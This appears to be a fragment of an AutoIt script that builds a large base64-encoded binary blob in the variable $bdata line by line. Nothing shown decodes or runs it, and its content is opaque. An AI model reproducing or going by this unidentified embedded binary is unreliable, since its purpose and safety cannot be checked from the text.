	$bdata &= "x7pAfjkbcMdcF4JhhlEAdqmUFyQGP1JhK1jQN4cQQ9It7u7DVPx4aUjRSWcnr/AJRvDYsShdJrQgjruTwapPbj+dsIwU2uLbsktkn2oPvtjbqLAusJOXi/0Dfzvz6trmsw9DKhwpjsI5Cjov1sFVzUmSjQAyrqw7hiw/snZIc0Xo2gjcAhQB4ljcCkQxISpFwIHiDNI/nbL/t3DsnwsrLAW0LIS64IjcAakn4ABX0SR1hLo2fh9WCX7VYMk6N//FntMhFDiENf/DxAaVXon58Jlgpa8RKsTwihvenQXWK4rQjTNMw4UbJ3hERCWgzpRqPUASR83f30wkuXpzKgt7DzhoeDaiiYbkstZfPC2ueq6PrQgXhF7mB/WSdDWoQVdxNnCTsQw/66w88GrCzfiAylEAoSdScZ9qFtP77eF8Xm07ik0sYezm1iW1n167cdqFM9COEvMOu+2UUK4O6rIY3rid0eIE/pfoTPwP1NZJY4yNrMA1B3tLe"
	$bdata &= "2Q0hMV51UoTsQO1VPVmEEHaKAwI6FToRV2HEOtvLS6LB9ESnAb+FKS2Ms2NxSUD/vkIJsUQwtUtzgE9tIT5714moI8vcWwh16gz5V0FJg8BQc1q3nMEItuHc7IxtL5912JGn9UwdnDnNkO3meuMip3Db+B3O7du9nVx5vRwdnkxY/z3+Lmmow/+cYwo2sDPlmOR4xEoGQAuD6kthoTbVWT4+GxHtbYA+FxZfAKEJPQOMPh7lhBAEittsIU4pVSgAQHw7JCZmsxWzrdwb22NoZPutqGV2x1diMd02667xtAW00+YPc60Ch6zNDIfztClM5Xdh2K4itMpd+oUzmimVX8gDaKkhQHwWqCRgbKtDr9tGlZlxNHtQ5lgtGUJDcAq9/VwRpFOK5z5Fmgz6tu8fQDbhIdAUNgI1+bksBC4RqFxkGGJeFZjrp/9M9xpxVHZnBxk6uRSkFpCjHByc01D/aW1DW1dRRM1f/EFqPyiDUyKsUJTw8FsAs"
	$bdata &= "j6CnwMI92yhBRdAgEscIPNHznr9mmE4SBwP/YIAOx3Z7J8/Ut+E+ITdgX57ndu0hb3AHYJCdcAIfeKp62CWIBQTkjfh6oVxAD1P4bSBeCgU3buuFgBmk0w+O4IRARyF+2x9QGDNXD93rEiIbBf2hIa5AK/iNFIGkIwS5+LRYCKyGXCvT9APDcIfAEtTXRAmXwCHdK0PgRiwp6OKOENiZx0dVDN/v5IZAQLUEAZOFb0sJcYUZ8SX3vh98GGiMDDbajqLZa+PaRiOm9MvAGkNtgzckAY+sD+JXVrhzVK/CJGuRQozTPBhpZwcj9GbsQ3BoNvhuiYesOYzuXlfgAN611h74EjLWChuHcrDp1wdCQGBejmoCa4iDjGOUESXfC3awgU1WaEsAhma3hiCS8A0AVqiAJs8Eb2AkAE8xQxHqdgCjMFe39JKdCd19SWoE0AoSrN4Doo9K1VS6DxARlPb2UAf7hdcHKGpW/+YjZAU8rHZo380vKnTpb"
	$bdata &= "AkdjJsCRthicAgNeNYbCg0V2Fpdvai3p/Acw0d0O2XY93dqCtMCgGX/174MsP2Q3pC7MuC6BVMi/w6uw2U2bJQ++0OxxAHCfOhORrBMkEn28qXv2YbYuBouz+2U9Rt42jS9m5C9a0nNdqF1J8fTTu/c1FfCa8AYA8Xz/wY3gm1fUtdr/zD9V05QXxgbGrVzGVyYKtdqr+pXCN8tI03/QBCNjCF/P/Qt1kmpPUFljhR85dVJDJwPE328g/Q0/Ik+jV44b4SnQVxyHxgnXRB0DJCgAMIu1w72CvYIGwxEYTjRNE1zKAoQGBRYMaAEBaIG6UQIQtTB9EgAsK9yfVt1CrD2kMK7pVf3IesWhEtS2zhXGaRYod86mlI5blz80Yl5BOvMhIHBiN9thPACGhioi1frGLgVF2lIVhSmSBeG7EHS49q43HbroMOJOAPWu2PIs0ZgSD0d2ApcNQXFOqgdQlNqRATMdODqJ7Y3sH44lfQDZ8Pca6O9sS"
	$bdata &= "qY0clJcrXHw1biYEUTyvi6zl8dV5hucFbpPUw9hBFGiiQz2lDclwcsBfxqEWwWHMLNYHkAo5NSC+RcV5HJBl8lMbWIU2HYEhKwtAEGugmEF+lIXB4PhcYqDRiWcARcfXlaaBaIFP3A1TuQNCo8DATS0Ek7cNpeIw4cS8vJyRgUJCUEQ0ILssURYr16tXfLZZZfTOshXkuL6jucdb/Sh5g0c0uDvxEA+jwAIu9MUkQT97VwIQS9iFn/t01sYxUhIyJggC5mEbJWMtwzCykl3gCdQAmg+kaSGYw5w6cFhgwlaKs5aZaSPAAKjPvTBR0A3Ur4BgqIq0AWgsFgTYaeSAOWpvBLj0qAOWTUh4DfoHj0jRwQA9JVSkXc2tWNUgNotrtNRvhAc0P6J44qHkhLZUFOUEgT1xZR6owBJ4s4EBoWbdYvJggoODtX9H0aEGJI8Fh2ZhRuTKieBvEEB8FZaz9EFMYO/zkFn4Dhpw5n4gw+A1gq0iUBCEU"
	$bdata &= "HRFB0NPTKwmreZGzCM9tBgnNgdLg40qmJiUMePOMIqXfPXcmYZVToUEsgUwjgKKfoZLChP/A5WPR1vJmlUpkMRR9m4o0SSwyQs1/o0dHQ1QzLw5KOgAy0bugFBCXD5w9bQVhEM3FePAFEYhm1kUWEhhci+DvDGdR2WOD/10gsBAJjANmaGSYGqZIWpb25B7ClhGzzClCHngUzcBOWE7WCY7NnlISgST4/AHD9EAOMV0u4pm3V+Gq3AF5CDgsMuwtYG1+uU42FCBSO2YZUTQQyvu0UE59/OTN0O792+2CAMYsSxnmEAE0iOyNg535FPm2NKEUZQxxjNllIbF1ge60cyliSmgCEULdEAqMQ4PWiIzd3aWPrAxtxblBZdDzYtILHaBCqZEGNsSshREITCBxs9A5w1kP3KOsFDSA6gM/gayIlKWr5ZHSDJeialnOMaDJhGEMQvG1p0WLFCqv0+/9pDHQKIFj9aOUeBLH4uo3xQAbgKoWQ8di9"
	$bdata &= "SU9M2FzWDQGAdg5IDhQy46EGCltcKHBhIWbl8x6bmhgvSAwUOA18XUxNRKgKBAEwQvphXttGqWmMnFJ3ER2E2fDBxDPO5F9RogFXls1s7i2jCTkRTG9L4KWlSN8oVgBQdB+BxFVWs9dQDyAdBY1vk/0rdu6Zgjx8UwlUTERtBQrhXVk28YDLM7j+RNzrRjOttybqa2nfkq3ipuUwU3YF3O78NjFTjao1nclTgStIaobxNO8ooDpqZgwULN01T/MSMAY0ck9MEMxIMyY4JGH59tPbU4nUagsAmOZV0AgMAgwq3QexnkQN2BMA3HCMBLTvEMwXLkQX8FhgalpXLNW3JDYOV2qiQbgl6wvQk3NhcAXLIPgsVP8/yucyorMeFl4kU9jju7v1BBRoAn+GyDQPKelIgQA8QFhGoFp7iV9aUAREiV1IcUon+PXRFgIuwfPAUAeroDK0D/bZCyELgTx4jjA9fIJOaRsEDeXDkJYXQTcEtoLAYLtuI"
	$bdata &= "sSCkyTrwACsyy0YjhS+BhEEDqI30ekKQjtBd/TwyQ4ksKquUQSaICu2/GJA+mE4BjoF9F/CsrgUBUk8fnTDnXj3rOWOlEcc1dIbWIUvHwQLuCIG36kuLBj8a3b3CCsbqb/Z6mcJG5KF/YfGhYJHSQtELSxFlZAAKdYlXEPjlT4xUJ+0TjScArZWJRsImLgxI13EaQjO1LYSn/35IyEngQqn2E6SNQZu28BTxBcUmQHUFTgLGEQDak4xAYD3w5h+9EFeBytprGYtmjw86/IRCzVZyI0QRwM32DvCd8CZwkPC14rrDzeIz15oBFAnjrZZWb/hW7CAxQ8PcEWkadU3MyAUZgojaPwCIYQ662pw3xKOfT0UBLFsoByOoFYJ6EUGG8BZQAusdQwCKVdcJJSLQZ14whSfGe4g6z4dwDtFbBcoL98jR1josR/ZBHxn5BBHSQjlEWgLGQNgyXW6BToJeFKz9i8B4MuChCzFlDS+16ssW/MaUjaoH3"
	$bdata &= "MwhLBNAdUwTyHshQciQFbjEYhDDxMrHd6NmcYjPxKrFPTDgh7sYGBsIkGp80le5/FaiFoX6aCgiQR8BFsYi3tHvBfd0JgULCkjiHQMotwd8xPYQGAkwGwHSamE1Ct9Kwh4kfAKjUMiC1d36V9A/XbGjUIWHnfemIP/F3fWVRFfQDD5O3fGHB9KLZkuDspGBZT4UvCGRHDj+CeNP93cS1DNiVXoYAT+l3+SZ1mJBiPCekqFXZAuBFtuhYJTByuLyiQcgm/UGB9Ctwhmgfk0opGF0XMJlDMzqbwC2D4qflIICggjpG5IukB0QLwDNArB9PjEEiAgJ+ySyPzhieM4oVEgltgWG8w1uDnKuZOnYcxLWuDws3crEMLsKbvH9FoKIT9oRcJ7EpcY+ZttAUXAd0wifZaU2H1g9MQcJtl4ZKCM3CpIjINwLjBgQWJmQMfxIAOh8JuXBBTPU39GselsAFKAO9tf8Z0mun8MOV/0+oheIOsUxx/dVIW"
	$bdata &= "wRDL+ySPIiIbQUAML62cF9Dk4wcgSHIrgEx9ACXGQ2gZIM6T0pgX/VvB/B6RyG/BOEFkU6woP+yUJMxAiry4HcrBj6AgMKyJxQSIWC97lw4corgiCRgziu3MzkiQUdQyoJxQjYfQoNUIIyOa5kCgoCPU2RjCowzTj9mSo7YcEpxbUdQAEBAZN0zQIDBAULVrggah9VdwBUFJQsDemWPHHuDAUCe4ig8KGWFpoR4vHMJdcFDUoLC8ImSpRdwPzA0ijkFCCFYAllf8BzdQwjZBwuMTTNE3TBISIjJCU0HawRpgaNRCmUGfDFgmJmJ+JS7chcx5HEXoHb7kLa0cJReaH087xs9pfKls+HK0Aoxl3LnRVKhiPzgRsywHfGJ/tF+TOAUMsDcJqBB3Ct2UHVid3WHRSNHdFy2DhK3QiEJ+tGnojSAJIFEQBD4X2kVmHf/MJbQvoIXQWSBupvJtwdK9IQl0ODA1BmoI/Det9g8DMFgg/aNhtxRkD"
	$bdata &= "gOtmJmt3ZbjTTrutdhRHdy/k3PZADC4FStMEzHYLaTy7005Lx/kAA99TmsmiLEKqOKJzA4eV9t505haWJ1DQClhsa9/e4bmQAGV3SXTG0nV3KXToVmzy+e55SllosVQWDOb+1m5X2nSVBuvDOnt0k/yQBA2uh4WNS/48rQrofvjZubajNHTYLZHxs/6ZCbc07YqvEAdXal/44b/xNQN1QmoFJy23UPJN0x5I0JpItJYNKTZB95H/jy3jA59CITsNcLF6ZzRUvoaJm3fxJcgEFtCslA7XF5sTu+V5Ht5SLgcX2e22vf83H1/lD9c3Nzm72BfEBxU/F5sO1ieufXfEX/8avKCdFD6T9a9NhJqDYJZqMxAM6ENaxxXsxrugJoSFxF5wTwjug1Mo1gjPjUcQFvKPBq5W/Mt1EIN+nZQtpAEe7FY5pNHAA8PE8PBWlY0JThWhgWOU1wzhsKbk8vXTFA6P0MDr/8Q453MA6QOBIZEXuxZSLLn5P"
	$bdata &= "UaJi7AZ3Y0YV8TsxSSNASgNJI0mkHD6bCwbK+BqMSb32OcNsBibiDcT4CjhIa509PRfSalALOxhig+A+TdDhv8ldT+KRwE8MXyEbjxBfHfHivswPFp/LBYCvsC2OOsGD11R+vYxR0fEFH0miwQGIrQKaELtAVwWPsHMHhEbW46jSAT/JFQ0qAL0CIAmn/wVnQM+4t4/6fiakjMgd5sAigvxYopDU8Z/TslPQ0N8BsYHP0fojCuc2IiNNIGnRPQLCy8H/zYxQFBXSZZpvb2LGimk/yD42vjrIDcJigOIB0dDmMIxlWQRgHjSB+ZObkwrOVcD5CNDR8wQtfX2ANCSAQzHQjjHHE3rFfqVEI6/tRBWqxp7kRdJbCYNT4/TQSnVG72asYEGFoQtGzgP/bH2Ed+SBu5MXT3m5pBqCR41K23I4RT04IV0hcIJvhx6w122XG6b3Zksi5PlENbEJFVCBpCnmsAwyGS2UUazDwQTAMHkGIp17g4pkY"
	$bdata &= "erGyc+gJiQoAdDF40klTJ0DCY4BmFDz21HLkAfRGeLcVIYCldZM0BZNDwqTQlQKDYYq8Ah8wX+oaFLackdmaTB0NKEwuvugFoSljdjHS8AaJ77fEFLk17CxALkAVGGxpATIImeCQlOMh0SK0pHu9n4pFcKOn5mjXsMvkHADJ28QGTIyFrsUKW5taKIV6BTEZkDJOlxSEvWiwG1yiU3Kdm7P6aEIDuNeQylh3EcGUs/WT+JHpWvwWLia0NZNmnB4QGAMOx0KtUEjOEB5t3gG8ahAhwhBWtIaKyuiyPOwjIQ5liGlFtIBCHVjgDdy/ZqnRQib4oKnIIHNNpTkJpasCADbqNxuNq1EEQaRwKmgwp0Hh6AHXhIDvof5yQ8ayjwlUewLxN2/LQ8Q5RIuNjO3nmaJAukQboQZf92Zb2yxqMFoXcHQLmOhA/zykO/LCsbiRsD7wKtYIgDdjaQFlgBkxTQTYNkuKP/P+iAEAFTJeUeCwtBA9kImE7"
	$bdata &= "eR8JL0/CF/zdUU3ixoMdXHijnRezkkouLYwQIbSMpfFpYWQMkESsIiyT8LOjhWf+2B85MirySQ2GPJI8kYU11S5kU8tySRgN/BCFaZrIK9B6D8s0fU29JK4R5gAArP5cgIfh+EgPBkrrBSemZXR+NEN1lToxKDgE4El1tSTd4IHLYXh6EkA1uT2pVGNySFlFKsk9RrzYJYvJxn810LqyhcWshi352T7sQP0ATPj0szfMD8yt9zcYNWObrMxUEIFQQ+UiOaRoAMew4KK2SzcEzA6aWei2alSBYyLWSROExqIdG6HM0WQnlQXy7+gF3FkBag2AM4wSulrdLNQillrIUTxymfIcMqYH0tbFQICsKNlwaFhEHPL/sFlSGMSK49MSkXJTYvkT8ICQYVkkrBnEhw0u4VkrcXmpDGfzfrMMPe+9TiJzSIPII7w+DkgPkYGAidMPII/YfosHjAnLRkk5zNhEkmqEzMiUWfSU3opR/BCP5hlYgF0OU"
	$bdata &= "FhB9jYM3woEcBdUkPj6g9NM6NLjSA+685PIlV+3rKQQi3BOA6LJuUyedVc4L4DAeciK1IszlVuGnEdP0NpAkKXK3AjYRGIkGzUjzewQTj/wI7AzSjDQj4BDMFCPNSDO0GKgcnDDSjDQgiCRsllyAF42I30CPhntRoZO6lYKReME5WV8lHxnaMwz8g8EJUR1crMaALrfzNIB02Ao0mZoBAPQYeoDyapCXRYdH+7TPECdUJqGsBvCWNGoM3HTQ/zo1gCIwO3grOHciavg54h77oMNZMRSpEFkL8nXLawQl1FWkv+r0n+sBbHj94A+HnwlkeAFjASyweICDP/+oE3yL/XUYmOVqHh3KeP889xJgE1lZoeos4EUDX/4OO+45nzJ+IlRQ6x4QCwmshrpV346gdRep7zTMXjLcxw+D5/DPDOm5ELHpJjkF7xYRehqEqHQNZa0mhcBbqA01gasN6s2ODtAWw0NZKTKDeam4DLEqI/Bg8B7ABXR1g"
	$bdata &= "z03JeXQUAxDJaE8g6D7Bk0dZ4w/AXyyTib2cnU38DbGcLoKQz4H55VxZagBMAHHIzYEfg9e7+oAPMADLbUhU7ZEkDw7Vp/7388ndxthahZeiTBXARyuTm1tbED96zjVrw08nnRmiTnrai38X0TRYIkCQkJGRmbsiqgPtEt17tgROIUU0C3BInzE6zWWE7TfW/N1EPSsZeI753YuauBYpkBMQQTqCNRgaxBEWffCC4Z2EyiypBovOl4miPdK9kbxMPwjMuSD/uB3aYdLg8YfvZxacObwiNMF1dFDQpA3NQgEBuvV1yiWinQAF1YmaPhLGg5C2ZZhngi4x62oLJtMOT0NdDNWTrpHpMOUcpBegqdMkJiqhYon60FmJ9YWDD9FZ783fA1PdAZHi8PHjkCkwxA7MJ49ClcGHgxJPhQ89I4qpa8ZJqAeRCz4JaPp4z0dTgKWFjaKwXBcwRrlU5PgOwiEq66e5gVJGh8uqwiipjEFlus1LeAgVR"
	$bdata &= "VGJ7LUKQhi3nIv+8p6fFMlMyyfnFMEmYFEKUbicC6+LEgmBvRZYHCMB7J5p81MDJAgupmgaU7RFMUp/OAx6CCa9u4BRqlTxzQYDocKNhI4aMtFhFHQlgaFS644SBBXLLSQ+rjSvNFodWx0q4DEMyjrX3eDB6c47El0aFfrcROrgUgFATRW+uIh7TfQNHQfGnbNVhYvxeoN5SWRo7GgujF+TYqQwhhA0hXwd+Wmn4J2KGAz0lgQcxxl02nK3FMBsVvrQVSphaDEEPJokyYGDtgIcdhJEgQyOCi4a1BG9OsVznMQK/NuA9/z9BE4weqajVzoMFwV8VfEzlibjZaQquY9TGocdhtLC46JPdVDAt/edcy6mDJaoGMCJT0BTQyo5okTqAucSCByuQ3EedXFrVLmAjwiVcJ1Nrp4/8SLrBK6k/QeF4KMxIgAstYA6UsYAVo5FAFFUsV2A/D0Bk/UB3oJBQNARv+Nnfj/DaD30Ecj2HQCA96NBDY"
	$bdata &= "72KDYaJxA8E731iNS2NRdw9C/DhFY6wN/HgVcADbwcinmEHyC8BREdgE4hbNv4gJXIQL0oA5PkQONZZhC3KEqVROwDU11AvMxEcJPXq5ynxUAXsJceIQzQY8GujVBV0z+L4ZlDEn/jXv3ZwCGEBTqzzMMOJvA2guwGAwfZQt/y0xABGZlalPTyAFrwP3+6p5IYUYJBl3Gf0WKU/x0Xo1EbSSGGXiDUFQAhhCLA4JPCQtZlIqwanwdEcZ37QF8RH9M3cFjCLqG6HXNmSQtgcJUwQ0YhBsydr3Tmr6nKPOBOWNzbZYq8Nz2ASAGm6CcIWgPaP8/sRlIjwaxudk9SBV0AcgwJoZ+vi/uLKiwmiw5aDSQoUAIaD1PQekEvi+0GZHLEMEMN1Y6QltPwUsIzOmBKtv1doH+CaPLup2orFImPkAtN7/YAENqCLThDzHRAe8AG8kLwaqqK31ACMgHpRcuhWLIwK5k9BuUJQFxV5I46qVc9G38i9j3"
	$bdata &= "EPBj/P/grVhZhwQkFqC0mSWdV2A1QGG9IX34AAQurptBUgNP+Ke2tJvjMY1U4P2owEEE7qC0ND0kO2SJuKsk8dnBCKQdyRhC7gXpg1mAqPMEva3KjGxpvNBHCmhI8CBAVjQ39VBkuwzOX+TC2OjGdlgMqRhhbgEKDXVGg3BG1ThTJiOAVuoCEBKOL/Sm4D8s2yAwGYNl2ACW3LFBxNcwIEOuM8FdVbIUF3LkAAxVWoo4U+zwM4EVsV70AC55SwEJmxaJba80+B6KLLLYj57IAUDCYGWdeA9KP2HvdJwdfwujh4gNzKarEVdaUFXUWU7IhlGYIub8H2AZZtTk2IkD2rGLDqYMhk9M0x4EChO0lhGD9f3hmu9mdBEwx0AzMCG6lcts62pgh8PyNUkYCxRe0ECPNXwVENcxeK9wgILA0m0u3dA3rY8lVRsZn8Nojy4vRwAgC858D19jHItrINo5rkngQrtGd6jYhjzLai1fWwoODvG+3dpOu"
	$bdata &= "hQh+ovGa8AULCZIt1CEkGBqfgVDEUaccAn/TQAyb3G3PkR9ysBGiTAVGDtfDNjbdlP483aJgbQeNwR4mb+JBt8jhBvNmNkbiaS1N5SwaDkXpZ1YxAg7aHQJM967pPDxQK9DkjuqiczwaUIh0ohSgSXmH4V0djv3hrBTmovBs/Fe6RNgdgczWC5S+YT5qEi+6Kzo6+DS4Vym8PS0QBIYOBL2Hhss0GfusBeN6MrVZsegWprtUR8HX6eEv8KLLX2UwaOaBATk34YDtFpIC8isiFaE9EDk9+HuNKUTyQooOgTxzGC6WhPhA9NmGlhMBQcI1JtUJhaxGa/IikqE3oH600JLNHEOOyh/izp4Wg7PdvoEcmAjhPYx99mDknSoiAdA0j8EkukBdfZoP2+xGOAIqAwQyoPiCunM3mqRwvOrsApP6gu9hafAXz3DrEvKLJlzQYcFHshETzSA4sV1Lm46KUTwL1CKUlKnUlfm8RgCXpzt9Exos4zRHP"
	$bdata &= "52Hnxan2KCpLb5kx9bJbZBFlqD5woPSF5ftPiDZqYGXbTMN/fHA+cVxYA0GGh0gHIgAVf8KvOl/ySVRDSkkDcJBM7WO9D2ROADA/u0vYHInzO4Po20kA8F/947OJAmyAb0GBgj0YoG7Ipdc0vARgFOCgKuMORrmhC0xse7zGC+MTOoV0sBOUtSWQbHAqZHg8ZeQCpNhgGIDJvneZ73BogOgHhwaOd5/p9gWItEjuSJRI/k6Oie53me7Ozw8PT0AJ7nefj4/PwGb5+THQPwA/jZi//peArneQa8yFiwZlBkji6QQxcGw2Bb+yNGIxW3hx0cV410Mc58OfwJ8ys4ySQN/cb87zZAUNwPDu7TNfCWJ7XlyMj5KzVEWJCZoT3vFlQGeKDaA3zebkllt6LuAbXvAbKeKm8qwkdX7lICiKO4tUuQT0hnthynaVoDA+q9g8QWNrcG9Ab8z/M87xwEBgwUHCQ3z/M8FzYcHBgYFDzP8zwUEBAMDJA"
	$bdata &= "8z/MICAQEnuc9h0cKUAZYaHwlTUUYxxYDAwgsUbwfDyfp0sCgd+WNsYRjqMvqqcaNcWnzxwAWaR+wyfgLw+tC9ph0N5qHBcbuN2Bsrs57G3+etwUF/CDNril9BZI5WZ/W6xG6x48CI0sPHuXI6VHHpMPRUOmKEMAp8DSkF4YSk1UdEaSFzMkWGCgnwMEMBEA8l+3ODt37VpLPfhM2kfjdDyZ1N3fr1bxJ6FkbIxIXe26ingV4e9J9YPumHoamIRQUdFIaUqlmz8sDu/QIqcstdcZ0DV4AlwYcNIA5RRR21JIAknCiLZCaAqhDYNu+5EC5d6yLzg+vwGb3sgSBtX4MAQ4H1iZgGrRghTWeJKr0sNaZOTaa6Ud0RMKl8IcTPQ+MNT7YSkHwkh87zAZ1RC9Y4zax+EQKHUWNKSmgi1/wPgF9+CvfBikiSOk/gML2OQQ7XfRyaCCNgA92dB+5chRmBd902XYJi8Es9AjyIATIAewRwys0B+O5"
	$bdata &= "fX3Yd8bDO0WTqucrTXG8v1kS1ymDJ0tGEthbYmr7tBCbAUXq2ClK4th6uyhV0EgwWb0Hmxka907YIESIAdpLEcDaxP9NIqkPGuoUFyEUSDe+MznQLcFU3g8UxsVDCv2HDXeUKgZYDCIcVzRjAV+0UxA5Vc/uiSxN5ABZTgwg+r2LXZgrww3VIhDr7DvEgCYDcE/kOTwIbm4irggUdDIYdTUd6XBzpCNWASuxSIVED6oTtUVlYCwx9H+2owfRVDM6EYTrbQyMgow3Kf8AI3ImZzmFmvQm4Gq3dSC1+OCR5BbmzjvKVxUDT79rOV8EGvzWXyqPvm3CUDrbJMPDKGEz+HzTeCBwmYTWlEBR+JQSsG2Lh70AxpCYK/H2wmg04P9taHRBilX8g+Yfa/Y4YQG+RLYUFgga3w3cKFAyBICI0TvQcxEoDBRuXIA6CkawXQL4FzZCO9Zy8Tld+Jj06G4N36XJhNJ473Uni/ZHSRNRgr4TV9J9JlP2/"
	$bdata &= "v5Zwdtd4L4KeCvBbvsFjRyd41FPeyBIA+wwd6JGMBrA9puNlVLoUh9+qltbcAUoCYA4GAP/XECccvPXZMkEvtTGP2HRPMBa+GdNyDmw2rASOeZ3D6EgsEvyuMEIVhms1zS2dANGsAbcjeccoGAp1ONEfTSuogPBXjzgWBiZkZDASd3qmByIxlvpJ06tjxwlVeM6NtsI8EA8Mr9ZcpaRAHmxo1tz7Dyog7TDqWboBEBN6EooqN4DiA5WpTLAXaBLKLBZYWyviLZYKHkITvzaFagYpIJdxBGo3g2kyKGRKW0YEw4bVpVl51ozyV7BrkeWF0lmXl3pG3ARcrA+Ajv+NoRjQwwBxzQwvDXSC1dRPFbyYLg83Bc9Pi0BfJM/BCvIxchBEwD7i8QlAPBedgpKA95FYFmUiAQkwy2vZuDIuADr6WlKSuAbzcZGY4F8zcCNxEhsukhoiU4OPxf0UUTdiEAO3KSFIYQ/w0hwKk7mfYkG2eGZZv4H26"
	$bdata &= "h0Fj8I35r/HWU4KvZAcAJ1FIMChkZJ/MQB6wpvynhTqyt+NNzWwfCqd9hRHQGu/tZ1L9FWmR8iFTSAzB7ggxE+WeBgcP0/SEAQdA/QUOw73m0PnHAaQw4TirtSgSql+VjrDQwUdeNnmhdfYGFXV79J6UjSGLIKFgg2/US28UIKBh2WYHRZjNaWqtYA/2yqBNYXOgR0GlHgcw7dBEpSV/i1sOqVwB0CYvCWB4JMZ0PoMBrfzTJ14/cfCE39ZqZmiiulg3aswvA068zRjTb4nPoMAvZBHdxEiR0mJjQvB+3x6wMI8hIL0UMCH8gN3nRVgDsNyetojUv/o6ArglERFrR4CkbBSAkCyEPGXxkiBcnKZjvOdSxmij4sTtZuSD6s242oU8Pl6yS9SGGwN3wzGLfrD1GgdAl1nltmADGHzKl/PfnJUzBhAfFZAIAfVkzXlgA0CiJTSWXFf+vsOF30WVl6+gDwcGAH4UFS43UrR79Ig1tqBfBjOBj"
	$bdata &= "XG2CwdS3UL90ErNKEzCiVAIpp4Otz3P5rQDPxNET4VlYXjSuA7QMQOB6URit1IFbqH5Q/ihc601SIVd/+tw1GihEWdEA4FA51BkE4HArvOBl0McL/CxY03lXsikwRHYDhBEdGhNhmtoLyOB8GEgp1vec+CCyRI3XH6+uZhjwYo0AmdB4pRD798AecVAYKufz4dPY4FT8Y9DleAjq7WIyKRp0SPkEmJDKgRwd/GkCKEJg+T9IfynCg5WQLSOujmcaPHa45VWJA3RUJ76gIPmbcxw4/DhK7dHTNF0D4DukPOXEMuD1BeBRTYrwEXpmEnHw4KgUHpUDwH0WJlkrzTEz4hgloIKmwfRCoy/gFBYqvRetOV0hsws74F7z4NDchQWkVyPrB4DFlNDfHOUUVaAKAywXQomu0OpN0WiMDQEFMgVNjb3XDml+dsKUj6JBHQkUgZwkhAjR4HbX0QZGRe6Lg9sdF5GM0auDV2uBCXqEyc1iKBDRA2ZE4"
	$bdata &= "mQqyfNftPqJBXsJoQxgy2TSiNaEhFJeFTCBeRExxFXsSCHz2GB1ffglXjvL5nuR3WHApaORWHBhDwEZwMHZGUEmeKqNwYZg0QK4r4f7hTeR4TuCIGOsRZqnM+EBhwHLpBVTgjQU5NiuIXD7/NkqLaS5ISLUTBd+Ery1bCnCzVJGOUgx3DXFDYBbx6zBVTGTKdOLszepDZlwkXGh9AogA/nUbvyyBtZfDtxDhiFJjYttR0hicgNFF8owAD+zQNXUsBlR1EsVZkOo/sNgC160QTQx37TXgHw+xDMU7Ost2LYtIBCuAODZAUJvhiS01j0zvInVlNsp+JhfrXIsAV1F+V45177DMooOvGmsve/hBWrII6yM8IlFQrBisHuo9SwM00oOwFFfIpZHQCaBl4HWRPi3SFEUsdBYUchHo06msyZkzLFDrwfDpkhQsV1O2cw6gYQORqa2uI2UyNeoF0ncXrUoaR+0pmeA5Rc4jOCTXUAn2fEHJiQPsD"
	$bdata &= "nihnGoYh4vBHkbLGALIC6OLQP+/HQaUXlAFAIDBKmiAlpgAgdEhTrDUi8Ji/oX5ApiSOEE3yW/bC+gLKRQZEGnJ/UPShN23A2rBw54mAC7UkpITgG6Uincl3hsFBOWjaKDHBQqkiuW5PN/74ROon6zTX7d0z7BJWbR3XzG8z2UzOxPA+snEWAvjjwYDR2QFBYYlO8EVJUKMViEh2wJ3S4ziAu8tKQUoHOe2bZjgOyTyDywEJJQ3ETAELjSq8dk8JFg8f0B/dNM4ZKD5WSDwSqRbkwAW37QQ32xLAKGE92b8mJT+PN7phdJ5Hq4MJIHxrb0EL778r4PQs63qBc3Sbiw7L9iw2zUj2hQR98IrdbhJcF4mEQYc5bPgQdkuK1DXSgA+FUyfGCHPDiyoJFCChN8NC+H/K96NawSD/QRyeFYxtGS/FGZZc0q4aAIwCR6rNtbEU70SxnIQUNcFBjeJhDynqRdWLEP+FtD6dDPB+2Q8mPKZilmjIa"
	$bdata &= "1fd0EYHYkHBAivgbQz9hxZoD5aGIbTVplldKiGIOXvxAjvXehNevaJXwGJADVQGHbKBDLBPFw30FILWgiQlSAP5IPESHdJleIVBLpTMfdJX/mkmUSXSO0U6IBPBUoR1iiA8AvhSzF2oh+XjAEePD74ooCBiJ0RqTFCF2UeeP8DBSlhoKgU1yW9BAryR7J7DLGhdkw0BDGw0DAZfwc4HDF0H0HIJqwKm4QqcuUvkFi9g3WdMCfBJVTMaFCA6G4JLu+eDqCrLKfKG5cMuBkeev8/dU5ACF51k4lwigb/BjrDdB7LxaoNLPDALm7SxK0S/gVGOB50I0ZMddmqe5QVpXz3+AG5h3MBXnVP/yogVFyiwestnQn5lDFL2iIwDh1iHLJHCASFVg1II6xw0iFbzQ/p+Vw40w7zdQd0EAJ8Lo4Mdx6jkAII8OmsozRVKPggTCckHnwIAniDVhA4IP9FGHAHhVBMhhYkqLDBQvA0Z0mtLsgWizNIUKr"
	$bdata &= "Au++NqDomi5pnh15AOER1uAl0fTpociooQlKwTwoiRfzh6D7G6yTcCFBXXEb+O7AoHi0Ht2snRuBQbBhPSzWi9egmQDXAAYcEbBzyrpZh3PwreO8BikUM/fKuOAd04AjgkY/HUITLUjisRw4RljQNlHz7bwrngViUMRAQALoMBIgZsqxY//hAAkJGTANPdfMAECzCGgMHQ8ATBSM2jVFjYMK3BVuKdiEQe4eB+DF0vAcWnr4OJLd4cieIH4EMdN9Nt+gfXZNn9yRiig+LVfCp8e+UWECKUB32wgR0Ofj0JAUOEZtTtZQ4E4Y8vkP7HfqIDkZHKH4WiC7rEXogHGFvWGiKgNJSisGIBjbkGy+6yJ4eiB7M9BawVpRpVWIMch0x39a3YxE4B0zeT0Q9FoVYB2YknaGLIhFAQGbwBhDdSvFmOYjUQ4OMXiDvZko4+wIBvEVDdDvN0tbddCvDZrVUG91ojmsaERbaDhyO0m3bbMcr2iJBQYgY"
